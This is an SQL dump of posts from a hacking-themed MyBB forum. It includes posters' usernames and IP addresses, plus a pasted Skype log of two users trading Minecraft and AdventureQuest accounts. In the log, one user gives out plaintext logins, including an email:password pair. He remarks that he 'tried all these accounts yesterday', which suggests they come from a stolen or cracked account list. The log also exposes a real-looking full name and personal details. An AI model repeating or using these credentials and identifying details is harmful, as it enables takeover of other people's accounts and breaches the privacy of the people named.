[url=http://www.systemrequirementslab.com/cyri/intro.aspx]http://www.systemrequirementslab.com/cyri/intro.aspx[/url] How to Site Looks like: [img]http://i.imgur.com/ziJwj.png[/img] I Hope that i helped a few people with this !!![/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '20574a97e833d0685197bd8f54f514be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4907', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '228', 'VirtualLegend', '1350406362', 'Welcome to LH. I Hope that you like it and of course stay Active & HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '77abbfd008841c30c1c0dfdf8f892536', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4908', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '62', 'R?????zo?', '1350408257', 'Alreay knew this, thanks for sharing though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a4856a87eed86475b8d69efa2d6ad77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4909', '888', '4832', '7', 'RE: Greed is a scammer', '0', '62', 'R?????zo?', '1350408917', 'That does not prove anything really.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd4aedcb678a26e695f45d450dc4a5040', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4910', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350409520', 'it does actually it proves that I couldn\'t of got back my account the way that he said so this is the end of this, and I going to get banned because I requested it. So yeah bye everyone and have a nice life and I hope you all do well when I\'m gone.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'd983503d8d4b0f7dae961e91713b00d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4911', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '100', '??zg???g????61', '1350414658', 'Only five people and its already been 4 days ;DD', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '9aa5ca8a1ba0ba1912fe11fa9d9e5067', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4912', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '82', 'iTzIpod', '1350416335', 'Welcome to L33tHacking. Enjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06111e49cc6e0e00826351bec2920209', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4913', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350416673', 'We want you, but we don\'t need you. You\'re telling me that your computer got hacked. But how? You didn\'t explain that... + If you got that from your email, just press Forgot Password on the login screen and give me the account. Simple and done.. Skype Chat Log: [10/14/2012 7:25:00 AM] Zane Anderson: Hello, Im Greed from l33t hacking [10/14/2012 12:07:55 PM] Ryan | Jacob: Ryan | Jacob has shared contact details with Zane Anderson. [10/14/2012 12:41:08 PM] Zane Anderson: hello [10/14/2012 12:41:24 PM] Ryan | Jacob: Hey [10/14/2012 12:41:40 PM] Zane Anderson: sorry im ussally on do not distrub [10/14/2012 12:42:06 PM] Zane Anderson: lol, I think it annoying when you get messaged [10/14/2012 12:42:42 PM] Zane Anderson: but yeah whats up? [10/14/2012 12:53:11 PM] Ryan | Jacob: No [10/14/2012 12:53:17 PM] Ryan | Jacob: I\'m just playing MC [10/14/2012 12:53:46 PM] Zane Anderson: eh im playing adventure quest [10/14/2012 12:53:52 PM] Ryan | Jacob: Oh [10/14/2012 12:53:55 PM] Ryan | Jacob: AQW? [10/14/2012 12:53:57 PM] Zane Anderson: no [10/14/2012 12:54:08 PM] Zane Anderson: i got a x guardian [10/14/2012 12:55:27 PM] Ryan | Jacob: Nice [10/14/2012 12:55:31 PM] Ryan | Jacob: Can I have? :3 [10/14/2012 12:55:36 PM] Zane Anderson: lol no [10/14/2012 12:55:49 PM] Zane Anderson: i just started him [10/14/2012 12:55:52 PM] Zane Anderson: he like lvl 23? [10/14/2012 12:55:55 PM] Ryan | Jacob: Nice [10/14/2012 12:56:14 PM] Zane Anderson: can\'t wait til lvl 30 [10/14/2012 12:56:28 PM] Zane Anderson: so i can get kung fu stuff [10/14/2012 12:57:54 PM] Zane Anderson: I also got a dragon amulet for dragonfable [10/14/2012 1:02:00 PM] Zane Anderson: oh hey do you have any mc account i can have? [10/14/2012 1:02:55 PM] Ryan | Jacob: YEah [10/14/2012 1:02:56 PM] Ryan | Jacob: Yeah [10/14/2012 1:02:57 PM] Ryan | Jacob: I got one [10/14/2012 1:03:12 PM] Zane Anderson: i can have it? [10/14/2012 1:03:20 PM] Ryan | Jacob: Yeah [10/14/2012 1:03:25 PM] Zane Anderson: ok [10/14/2012 1:03:52 PM] Ryan | Jacob: Got anything to trade for it? [10/14/2012 1:03:53 PM] Ryan | Jacob: :P [10/14/2012 1:04:42 PM] Zane Anderson: how bout my aqw guy? [10/14/2012 1:05:54 PM] Ryan | Jacob: Can I see the character things? [10/14/2012 1:05:58 PM] Ryan | Jacob: Character Page [10/14/2012 1:06:10 PM] Zane Anderson: yeah [10/14/2012 1:06:50 PM] Zane Anderson: http://www.aq.com/aw-character.asp?id=Toki%20The%20ArchAngel [10/14/2012 1:07:57 PM] Zane Anderson: has 3 month membership [10/14/2012 1:08:36 PM] Ryan | Jacob: Anything else on it? [10/14/2012 1:09:03 PM] Zane Anderson: hmmm i think a few ac [10/14/2012 1:09:27 PM] Ryan | Jacob: When did you get membership on it? [10/14/2012 1:09:34 PM] Ryan | Jacob: When did you start playing AQW? [10/14/2012 1:09:38 PM] Zane Anderson: lol [10/14/2012 1:09:40 PM] Ryan | Jacob: Isn\'t it boring? [10/14/2012 1:10:04 PM] Zane Anderson: my guy was created 10/5/12 [10/14/2012 1:10:15 PM] Ryan | Jacob: Oh [10/14/2012 1:10:26 PM] Ryan | Jacob: You sure about this trade? [10/14/2012 1:10:51 PM] Zane Anderson: yeah, ill just unlink from my master account [10/14/2012 1:10:57 PM] Zane Anderson: then it be yours [10/14/2012 1:11:02 PM] Ryan | Jacob: Yeah but [10/14/2012 1:11:17 PM] Ryan | Jacob: Is there any other accounts linked to the AQW account? [10/14/2012 1:11:25 PM] Ryan | Jacob: AQ, DF, MQ, etc? [10/14/2012 1:11:35 PM] Zane Anderson: yeah my aq guy and df guy [10/14/2012 1:12:58 PM] Zane Anderson: so? [10/14/2012 1:14:11 PM] Ryan | Jacob: Oh [10/14/2012 1:14:13 PM] Ryan | Jacob: Okay. [10/14/2012 1:14:22 PM] Ryan | Jacob: Do you like playing AQW though? [10/14/2012 1:14:31 PM] Zane Anderson: why? lol [10/14/2012 1:15:02 PM] Ryan | Jacob: Just asking? [10/14/2012 1:15:09 PM] Zane Anderson: not really [10/14/2012 1:15:33 PM] Ryan | Jacob: Lol alright [10/14/2012 1:15:37 PM] Ryan | Jacob: You want to go first or something? [10/14/2012 1:16:08 PM] Zane Anderson: wait [10/14/2012 1:16:26 PM] Zane Anderson: i try to remove it from my master account [10/14/2012 1:16:31 PM] Zane Anderson: but [10/14/2012 1:16:40 PM] Zane Anderson: it said this [10/14/2012 1:16:41 PM] Zane Anderson: Sorry! You may not unlink your VIP Membership Account. [10/14/2012 1:17:04 PM] Zane Anderson: so is it okay if it still link to my account? [10/14/2012 1:17:26 PM] Ryan | Jacob: I don\'t know :/ [10/14/2012 1:18:02 PM] Zane Anderson: well I don\'t want to screw you over [10/14/2012 1:20:10 PM] Ryan | Jacob: Well you have access to the account [10/14/2012 1:20:13 PM] Ryan | Jacob: If you give me it [10/14/2012 1:20:21 PM] Ryan | Jacob: Since it\'s linked to your Master Account. [10/14/2012 1:21:11 PM] Zane Anderson: so this is a no go? [10/14/2012 1:21:23 PM] Ryan | Jacob: I don\'t know.. [10/14/2012 1:21:31 PM] Ryan | Jacob: I have a feeling I might get scammed [10/14/2012 1:21:55 PM] Zane Anderson: like i said i don\'t want to screw you over [10/14/2012 1:22:22 PM] Ryan | Jacob: Well I don\'t know who you are.. -.- [10/14/2012 1:22:54 PM] Zane Anderson: well im greed from leet hacking lol [10/14/2012 1:23:14 PM] Zane Anderson: and im zane irl [10/14/2012 1:23:22 PM] Zane Anderson: lol [10/14/2012 1:24:04 PM] Ryan | Jacob: Oh [10/14/2012 1:24:14 PM] Zane Anderson: ? [10/14/2012 1:24:34 PM] Ryan | Jacob: Well [10/14/2012 1:24:37 PM] Ryan | Jacob: Umm [10/14/2012 1:24:43 PM] Ryan | Jacob: You wanna go first or what? [10/14/2012 1:24:49 PM] Ryan | Jacob: I don\'t mind going first. [10/14/2012 1:25:01 PM] Zane Anderson: let me [10/14/2012 1:25:17 PM] Zane Anderson: well you know the name Toki the ArchAngel right? [10/14/2012 1:25:30 PM] Zane Anderson: well the password is Removed for safety reasons [10/14/2012 1:25:39 PM] Zane Anderson: now you [10/14/2012 1:27:02 PM] Zane Anderson: so? [10/14/2012 1:27:32 PM] Ryan | Jacob: Username: fly787 [10/14/2012 1:27:38 PM] Ryan | Jacob: Password: flydream787 [10/14/2012 1:27:43 PM] Ryan | Jacob: Tell me if it works or no [10/14/2012 1:27:44 PM] Ryan | Jacob: Not [10/14/2012 1:27:47 PM] Ryan | Jacob: I will give you a new one [10/14/2012 1:27:57 PM] Zane Anderson: wait don\'t i need a email to login? [10/14/2012 1:28:08 PM] Ryan | Jacob: No [10/14/2012 1:28:12 PM] Ryan | Jacob: Unless it\'s Migrated. [10/14/2012 1:28:44 PM] Zane Anderson: Oops, unknown username or password. If you are logging in with a Mojang account make sure to use your e-mail address as username. [10/14/2012 1:29:18 PM] Ryan | Jacob: Oh [10/14/2012 1:29:20 PM] Ryan | Jacob: Alright. [10/14/2012 1:29:26 PM] Ryan | Jacob: Wait [10/14/2012 1:29:29 PM] Zane Anderson: ? [10/14/2012 1:29:30 PM] Ryan | Jacob: Try it vice versa [10/14/2012 1:29:34 PM] Zane Anderson: k [10/14/2012 1:29:42 PM] Ryan | Jacob: [Sunday, October 14, 2012 1:27 PM] Ryan | Jacob: <<< Username: fly787 Password: flydream787 [10/14/2012 1:29:46 PM] Ryan | Jacob: Password is Username [10/14/2012 1:29:49 PM] Ryan | Jacob: Username is Password [10/14/2012 1:30:25 PM] Zane Anderson: still cant [10/14/2012 1:30:31 PM] Ryan | Jacob: Okay. [10/14/2012 1:30:37 PM] Zane Anderson: have you tried? [10/14/2012 1:30:47 PM] Ryan | Jacob: Nope :3 [10/14/2012 1:30:48 PM] Ryan | Jacob: jquilty@uk2.net:bentley [10/14/2012 1:30:53 PM] Ryan | Jacob: Username/Email:Password [10/14/2012 1:30:54 PM] Ryan | Jacob: ^ [10/14/2012 1:30:56 PM] Ryan | Jacob: Should work [10/14/2012 1:30:58 PM] Ryan | Jacob: For that one [10/14/2012 1:31:12 PM] Zane Anderson: pasword? [10/14/2012 1:31:18 PM] Zane Anderson: both? [10/14/2012 1:31:26 PM] Zane Anderson: wait [10/14/2012 1:31:30 PM] Zane Anderson: lol [10/14/2012 1:31:35 PM | Edited 1:31:41 PM] Ryan | Jacob: Password is bentley [10/14/2012 1:31:56 PM] Ryan | Jacob: Tried all these accounts yesterday.. [10/14/2012 1:32:16 PM] Zane Anderson: mk [10/14/2012 1:33:44 PM] Zane Anderson: ok it worked [10/14/2012 1:33:57 PM] Ryan | Jacob: Okay. [10/14/2012 1:35:12 PM] Ryan | Jacob: So can I change the password [10/14/2012 1:35:16 PM] Ryan | Jacob: And all on the AQW account? [10/14/2012 1:35:29 PM] Zane Anderson: yep [10/14/2012 1:35:34 PM] Ryan | Jacob: Okay. [10/14/2012 1:35:58 PM] Zane Anderson: looks like i cant change anything on the mc account [10/14/2012 1:36:46 PM] Ryan | Jacob: What do you mean? [10/14/2012 1:37:07 PM] Zane Anderson: im trying to change the password on the minecraft account [10/14/2012 1:37:22 PM] Zane Anderson: but cant lol [10/14/2012 1:37:26 PM] Ryan | Jacob: Whynot? [10/14/2012 1:37:38 PM] Zane Anderson: Since you are logging in from this computer for the first time we need you to confirm your identity before you can continue. This is to make sure that your account isn\'t used without your authorization. To confirm your identity, please answer the questions below. [10/14/2012 1:38:32 PM] Ryan | Jacob: What\'s the question? [10/14/2012 1:38:42 PM] Zane Anderson: What is the name of your favorite cartoon? [10/14/2012 1:38:50 PM] Ryan | Jacob: Try [10/14/2012 1:38:52 PM] Ryan | Jacob: Spongebob [10/14/2012 1:38:56 PM] Ryan | Jacob: Or someshit? [10/14/2012 1:38:58 PM] Ryan | Jacob: Uhh [10/14/2012 1:38:59 PM] Ryan | Jacob: Try 123 [10/14/2012 1:39:44 PM] Zane Anderson: no [10/14/2012 1:39:53 PM] Zane Anderson: doesnt work [10/14/2012 1:41:09 PM] Ryan | Jacob: :/ [10/14/2012 1:41:27 PM] Ryan | Jacob: I can\'t change the email or anything. [10/14/2012 1:41:54 PM] Zane Anderson: why? [10/14/2012 1:42:03 PM] Ryan | Jacob: You gotta verify it. [10/14/2012 1:42:11 PM] Zane Anderson: oh [10/14/2012 1:42:19 PM] Zane Anderson: well help me lol [10/14/2012 1:42:47 PM] Ryan | Jacob: I will. [10/14/2012 1:42:55 PM] Ryan | Jacob: I\'ll just give you my personal account... [10/14/2012 1:43:09 PM] Zane Anderson: oh? [10/14/2012 1:43:15 PM] Zane Anderson: really? [10/14/2012 1:43:18 PM | Edited 1:43:24 PM] Ryan | Jacob: Yeah. [10/14/2012 1:43:33 PM] Zane Anderson: well ok [10/14/2012 1:43:38 PM] Ryan | Jacob: Email? [10/14/2012 1:43:45 PM] Zane Anderson: ok [10/14/2012 1:43:53 PM] Zane Anderson: i vefifyed it [10/14/2012 1:44:02 PM] Zane Anderson: can never spell that word right [10/14/2012 1:44:12 PM] Ryan | Jacob: Verified? [10/14/2012 1:44:14 PM] Zane Anderson: yea [10/14/2012 1:44:28 PM] Zane Anderson: now its in ur email [10/14/2012 1:44:33 PM] Ryan | Jacob: Okay. [10/14/2012 1:44:35 PM] Ryan | Jacob: Wait [10/14/2012 1:44:38 PM] Ryan | Jacob: I\'m changing the information [10/14/2012 1:44:40 PM] Ryan | Jacob: Uhm [10/14/2012 1:44:42 PM] Ryan | Jacob: For the MC account [10/14/2012 1:44:47 PM] Zane Anderson: k [10/14/2012 1:44:47 PM] Ryan | Jacob: What email do you want it to be. [10/14/2012 1:44:55 PM] Zane Anderson: well my email [10/14/2012 1:45:11 PM] Zane Anderson: Removed for safety reasons [10/14/2012 1:46:37 PM] Ryan | Jacob: Okay. [10/14/2012 1:47:14 PM] Zane Anderson: mk [10/14/2012 1:47:30 PM] Ryan | Jacob: There. [10/14/2012 1:47:33 PM] Ryan | Jacob: Check your email? [10/14/2012 1:47:40 PM] Ryan | Jacob: Username: Removed for safety reasons [10/14/2012 1:47:44 PM] Ryan | Jacob: Password: Removed for safety reasons [10/14/2012 1:47:47 PM] Ryan | Jacob: Email: Removed for safety reasons [10/14/2012 1:48:08 PM] Ryan | Jacob: Did you receive it? [10/14/2012 1:48:11 PM] Zane Anderson: yeah [10/14/2012 1:48:16 PM] Zane Anderson: um [10/14/2012 1:48:26 PM] Ryan | Jacob: Change the Password [10/14/2012 1:48:26 PM] Zane Anderson: now i need to confrim it [10/14/2012 1:48:36 PM] Ryan | Jacob: So I can\'t login the account anymore. [10/14/2012 1:48:39 PM] Zane Anderson: whats your fathers middle name [10/14/2012 1:48:42 PM] Ryan | Jacob: 123 [10/14/2012 1:48:45 PM] Zane Anderson: k [10/14/2012 1:48:50 PM] Ryan | Jacob: Is the Security Questions [10/14/2012 1:48:53 PM] Zane Anderson: got it [10/14/2012 1:48:54 PM] Ryan | Jacob: For everything. [10/14/2012 1:49:03 PM] Ryan | Jacob: And now [10/14/2012 1:49:12 PM] Ryan | Jacob: Are you done with the MC account? [10/14/2012 1:49:40 PM] Zane Anderson: yea [10/14/2012 1:49:48 PM] Ryan | Jacob: Okay. [10/14/2012 1:49:49 PM] Ryan | Jacob: Back to me [10/14/2012 1:49:57 PM] Zane Anderson: k [10/14/2012 1:50:43 PM] Zane Anderson: now what ya need? [10/14/2012 1:51:20 PM] Ryan | Jacob: Okay [10/14/2012 1:51:47 PM] Ryan | Jacob: Did it work? [10/14/2012 1:51:51 PM] Ryan | Jacob: Check your email [10/14/2012 1:51:52 PM] Ryan | Jacob: For anything? [10/14/2012 1:52:02 PM] Zane Anderson: well now its your email [10/14/2012 1:52:13 PM] Ryan | Jacob: Okay. [10/14/2012 1:52:23 PM] Ryan | Jacob: But you still can access the account right? [10/14/2012 1:52:27 PM] Ryan | Jacob: Through your Master Account.. [10/14/2012 1:52:49 PM] Zane Anderson: yeah i see him [10/14/2012 1:52:59 PM] Ryan | Jacob: Oh [10/14/2012 1:53:00 PM] Ryan | Jacob: :/ [10/14/2012 1:53:04 PM | Edited 1:53:09 PM] Ryan | Jacob: Now you know my Password. [10/14/2012 1:53:14 PM] Ryan | Jacob: And you can access the account. [10/14/2012 1:53:15 PM] Zane Anderson: did you change his password? [10/14/2012 1:53:17 PM] Ryan | Jacob: Yeah. [10/14/2012 1:53:28 PM] Zane Anderson: then i cant do anything to him [10/14/2012 1:53:43 PM] Zane Anderson: i need to login into him to do anything [10/14/2012 1:53:59 PM] Ryan | Jacob: Oh. [10/14/2012 1:54:04 PM] Zane Anderson: so your good [10/14/2012 1:54:34 PM] Ryan | Jacob: Okay. [10/14/2012 1:55:14 PM] Zane Anderson: well that worked out well [10/14/2012 1:55:27 PM] Ryan | Jacob: Okay. [10/14/2012 1:55:34 PM] Ryan | Jacob: Hoping it\'s good. [10/14/2012 1:55:37 PM] Ryan | Jacob: And worth the trade. [10/14/2012 1:55:46 PM] Zane Anderson: wait can you acess the mc account by the 123 thingy [10/14/2012 1:56:30 PM] Zane Anderson: nvm [10/14/2012 1:56:35 PM] Ryan | Jacob: Nope [10/14/2012 1:56:44 PM] Ryan | Jacob: Not connected to my email [10/14/2012 1:56:49 PM] Ryan | Jacob: + I don\'t know the password. [10/14/2012 1:56:54 PM] Zane Anderson: btw your born in 93 too? [10/14/2012 1:57:00 PM] Ryan | Jacob: Security Questions are no use [10/14/2012 1:57:01 PM] Ryan | Jacob: No [10/14/2012 1:57:08 PM] Ryan | Jacob: I just made up the name and birthday [10/14/2012 1:57:11 PM] Zane Anderson: oh [10/14/2012 1:57:15 PM] Ryan | Jacob: :3 [10/14/2012 1:57:21 PM] Zane Anderson: well i was born in 93 [10/14/2012 1:57:25 PM] Ryan | Jacob: Oh [10/14/2012 1:57:35 PM] Zane Anderson: its almost my birthday lol [10/14/2012 1:57:53 PM] Zane Anderson: its on the 21 of this month [10/14/2012 1:57:55 PM] Ryan | Jacob: Happy Earliy Birthday [10/14/2012 1:57:57 PM] Ryan | Jacob: :) [10/14/2012 1:58:14 PM] Zane Anderson: lol ty [10/14/2012 1:59:15 PM] Zane Anderson: now to change my skin to look more creeper [10/14/2012 2:03:43 PM] Ryan | Jacob: Lolo [10/14/2012 2:03:45 PM] Ryan | Jacob: Lool [10/14/2012 2:03:50 PM] Ryan | Jacob: Wanna play MC together or something? [10/14/2012 2:03:54 PM] Ryan | Jacob: Or AQW? :P [10/14/2012 2:03:58 PM] Zane Anderson: ima slenderman now! [10/14/2012 2:04:05 PM] Ryan | Jacob: Omg [10/14/2012 2:04:09 PM] Ryan | Jacob: I love Slenderman [10/14/2012 2:04:15 PM] Ryan | Jacob: But I don\'t want to risk my skin [10/14/2012 2:04:31 PM] Zane Anderson: lol you should of seen me on one of the cracked servers [10/14/2012 2:04:50 PM] Zane Anderson: standing in front of someguys window [10/14/2012 2:04:58 PM] Zane Anderson: just staring [10/14/2012 2:05:00 PM] Ryan | Jacob: Lol [10/14/2012 2:05:15 PM] Ryan | Jacob: House in the middle of the woods [10/14/2012 2:05:18 PM] Ryan | Jacob: A guy\'s in there. [10/14/2012 2:05:19 PM] Ryan | Jacob: :P [10/14/2012 2:05:33 PM] Zane Anderson: but yeah what server you play in minecraft? [10/14/2012 2:06:40 PM] Ryan | Jacob: Just saying [10/14/2012 2:06:52 PM] Ryan | Jacob: You bought too much useless items with your AC :/ [10/14/2012 2:06:57 PM] Ryan | Jacob: I only got 81 ACs [10/14/2012 2:07:01 PM] Ryan | Jacob: And I can\'t buy anything with it [10/14/2012 2:07:05 PM] Zane Anderson: er.... lol [10/14/2012 2:07:11 PM] Zane Anderson: just sell the useless crap [10/14/2012 2:07:17 PM] Zane Anderson: lol [10/14/2012 2:10:09 PM] Ryan | Jacob: :/ [10/14/2012 2:10:16 PM] Ryan | Jacob: Got no ACs from that :P [10/14/2012 2:10:20 PM] Zane Anderson: really? [10/14/2012 2:10:27 PM] Ryan | Jacob: Yeah.. [10/14/2012 2:10:37 PM] Zane Anderson: er [10/14/2012 2:10:39 PM] Zane Anderson: lol [10/14/2012 2:11:10 PM] Zane Anderson: well i have no money to spen [10/14/2012 2:11:14 PM] Zane Anderson: spend* [10/14/2012 2:18:58 PM] Ryan | Jacob: :/ [10/14/2012 2:19:00 PM] Ryan | Jacob: Okay. [10/14/2012 2:19:23 PM] Zane Anderson: so how do i find server to play lol [10/14/2012 2:19:39 PM] Ryan | Jacob: Search on Google [10/14/2012 2:19:45 PM] Ryan | Jacob: :P [10/14/2012 2:19:47 PM] Zane Anderson: mk [10/14/2012 2:19:48 PM] Ryan | Jacob: What else [10/14/2012 2:19:50 PM] Ryan | Jacob: xD [10/14/2012 2:26:37 PM] Ryan | Jacob: You playing it? :P [10/14/2012 2:26:46 PM] Zane Anderson: yea [10/14/2012 2:26:52 PM] Ryan | Jacob: Wait [10/14/2012 2:26:53 PM] Ryan | Jacob: Answer it [10/14/2012 2:26:59 PM] Ryan | Jacob: Mute your mic if you want. [10/14/2012 2:27:09 PM] Ryan | Jacob: I need to show you something. [10/14/2012 2:27:17 PM] Ryan | Jacob: Using ShareScreen [10/14/2012 2:27:20 PM] *** Call to Zane Anderson, no answer. *** [10/14/2012 2:28:00 PM] *** Call to Zane Anderson, no answer. *** [10/14/2012 2:28:57 PM] Ryan | Jacob: :/ [10/14/2012 2:30:45 PM] Zane Anderson: uhh [10/14/2012 2:30:58 PM] Zane Anderson: i answer then my computer failed on me [10/14/2012 2:31:04 PM] Ryan | Jacob: :// [10/14/2012 2:31:05 PM] Ryan | Jacob: :/ [10/14/2012 2:31:21 PM] *** Call to Zane Anderson *** [10/14/2012 2:31:30 PM] Ryan | Jacob: Lool [10/14/2012 2:31:34 PM] Ryan | Jacob: My brother was singing -.- [10/14/2012 2:31:49 PM] Ryan | Jacob: Is this ok [10/14/2012 2:32:18 PM] Ryan | Jacob: ?? [10/14/2012 2:32:57 PM] Ryan | Jacob: Is it good? [10/14/2012 2:33:08 PM] Ryan | Jacob: Okay [10/14/2012 2:33:10 PM] Ryan | Jacob: Thanks :) [10/14/2012 2:33:25 PM] *** Call ended, duration 02:04 *** [10/14/2012 2:33:34 PM] Zane Anderson: woah [10/14/2012 2:33:38 PM] Ryan | Jacob: ? [10/14/2012 2:33:45 PM] Zane Anderson: thats was something new for me [10/14/2012 2:33:51 PM] Ryan | Jacob: What was? [10/14/2012 2:33:54 PM] Zane Anderson: calling [10/14/2012 2:33:59 PM] Ryan | Jacob: :P [10/14/2012 2:37:24 PM] Zane Anderson: so you on aqw? [10/14/2012 2:37:32 PM] Ryan | Jacob: Yah [10/14/2012 2:37:35 PM] Ryan | Jacob: Haven\'t done anything [10/14/2012 2:37:38 PM] Zane Anderson: lol [10/14/2012 2:37:41 PM] Ryan | Jacob: Was in Battleon afk the whole time [10/14/2012 2:38:05 PM] Zane Anderson: btw how did my voice sound lol [10/14/2012 2:38:13 PM] Ryan | Jacob: Horrible :3 [10/14/2012 2:38:18 PM] Ryan | Jacob: Probably your mic though [10/14/2012 2:38:22 PM] Ryan | Jacob: Too much wind or something [10/14/2012 2:38:31 PM] Ryan | Jacob: And background noise was horrifying [10/14/2012 2:38:36 PM] Zane Anderson: lol [10/14/2012 2:38:56 PM] Zane Anderson: i was wondering cuz i had something in my mouth [10/14/2012 2:39:00 PM] Ryan | Jacob: Oh [10/14/2012 2:39:43 PM] Zane Anderson: did i sound manly? lol [10/14/2012 2:39:58 PM] Ryan | Jacob: No. [10/14/2012 2:40:05 PM] Ryan | Jacob: + I could barely hear you. [10/14/2012 2:40:06 PM] Zane Anderson: lol [10/14/2012 2:40:10 PM] Ryan | Jacob: Background noise [10/14/2012 2:40:15 PM] Ryan | Jacob: + wind or something. [10/14/2012 2:40:16 PM] Zane Anderson: probabaly [10/14/2012 2:40:26 PM] Zane Anderson: gah, my laptop [10/14/2012 2:40:41 PM] Zane Anderson: i think it was the vent on the side [10/14/2012 2:40:51 PM] Zane Anderson: and theirs a fan going off in the next room [10/14/2012 2:42:27 PM] Ryan | Jacob: Yeah [10/14/2012 2:42:42 PM] Zane Anderson: lol [10/14/2012 2:43:59 PM] Zane Anderson: btw you watch pewdiepie or tobuscus? [10/14/2012 2:44:10 PM] Ryan | Jacob: No [10/14/2012 2:44:53 PM] Zane Anderson: oh ok [10/14/2012 4:15:03 PM] Zane Anderson: so you still playing? lol [10/14/2012 4:15:12 PM] Ryan | Jacob: No :3 [10/14/2012 4:15:13 PM] Ryan | Jacob: Loo [10/14/2012 4:15:14 PM] Ryan | Jacob: Lool [10/14/2012 4:15:24 PM] Ryan | Jacob: Just gave you +4 Rep on L33tHacking [10/14/2012 4:15:31 PM] Zane Anderson: lol rly? [10/14/2012 4:15:35 PM] Ryan | Jacob: Yeah. [10/14/2012 4:15:57 PM] Ryan | Jacob: You\'re welcome. [10/14/2012 4:16:02 PM] Zane Anderson: smow zow [10/14/2012 4:16:52 PM] Ryan | Jacob: Hmm? [10/14/2012 4:17:06 PM] Zane Anderson: idk got it off of adventure time [10/14/2012 4:17:13 PM] Ryan | Jacob: Lool [10/14/2012 4:17:14 PM] Ryan | Jacob: :P [10/14/2012 4:17:18 PM] Ryan | Jacob: How about you? [10/14/2012 4:17:21 PM] Ryan | Jacob: Still playing MC? [10/14/2012 4:17:41 PM] Zane Anderson: nop, gonna watch a video on youtube [10/14/2012 4:17:58 PM] Ryan | Jacob: Okay. [10/14/2012 4:18:05 PM] Ryan | Jacob: Are you sure it\'s not RedTube? [10/14/2012 4:18:07 PM] Ryan | Jacob: Hm? [10/14/2012 4:18:08 PM] Ryan | Jacob: :P [10/14/2012 4:18:18 PM] Zane Anderson: http://www.youtube.com/watch?v=GAgqfvy4uYA&feature=g-all-u [10/14/2012 4:19:45 PM] Ryan | Jacob: What can I get from the DF account? [10/14/2012 4:19:56 PM] Zane Anderson: idk lol [10/14/2012 4:20:16 PM] Ryan | Jacob: Is it a member too? [10/14/2012 4:20:20 PM] Ryan | Jacob: The DF account [10/14/2012 4:20:23 PM] Zane Anderson: the stupid 10th annivesery came out [10/14/2012 4:20:38 PM] Ryan | Jacob: And? [10/14/2012 4:20:40 PM] Zane Anderson: so i couldn\'t find the tower to get the df [10/14/2012 4:20:47 PM] Zane Anderson: items [10/14/2012 4:20:50 PM] Ryan | Jacob: What do you mean [10/14/2012 4:20:54 PM] Ryan | Jacob: Oh [10/14/2012 4:21:03 PM] Zane Anderson: where you get like df and mq and aq items [10/14/2012 4:21:08 PM] Ryan | Jacob: Oh [10/14/2012 4:21:13 PM] Zane Anderson: couldn\'t find it [10/14/2012 4:21:57 PM] Ryan | Jacob: Same.. [10/14/2012 4:22:09 PM] Zane Anderson: ik that pissed me off [10/14/2012 4:25:20 PM] Ryan | Jacob: Can\'t find it.. [10/14/2012 4:25:25 PM] Ryan | Jacob: It\'s supposed to be in the tower.. [10/14/2012 4:25:48 PM] Zane Anderson: yeah but that 10th anniversry crap is there [10/14/2012 4:26:26 PM] Ryan | Jacob: -.- [10/14/2012 4:26:28 PM] Ryan | Jacob: Yeh [10/14/2012 4:27:12 PM] Ryan | Jacob: Really gay.. [10/14/2012 4:27:18 PM] Zane Anderson: yea [10/14/2012 4:27:30 PM] Ryan | Jacob: Just gonna train.. [10/14/2012 4:27:34 PM] Ryan | Jacob: Nothing better to do.. [10/14/2012 4:28:53 PM] Zane Anderson: atleast its almost over [10/14/2012 4:29:38 PM] Ryan 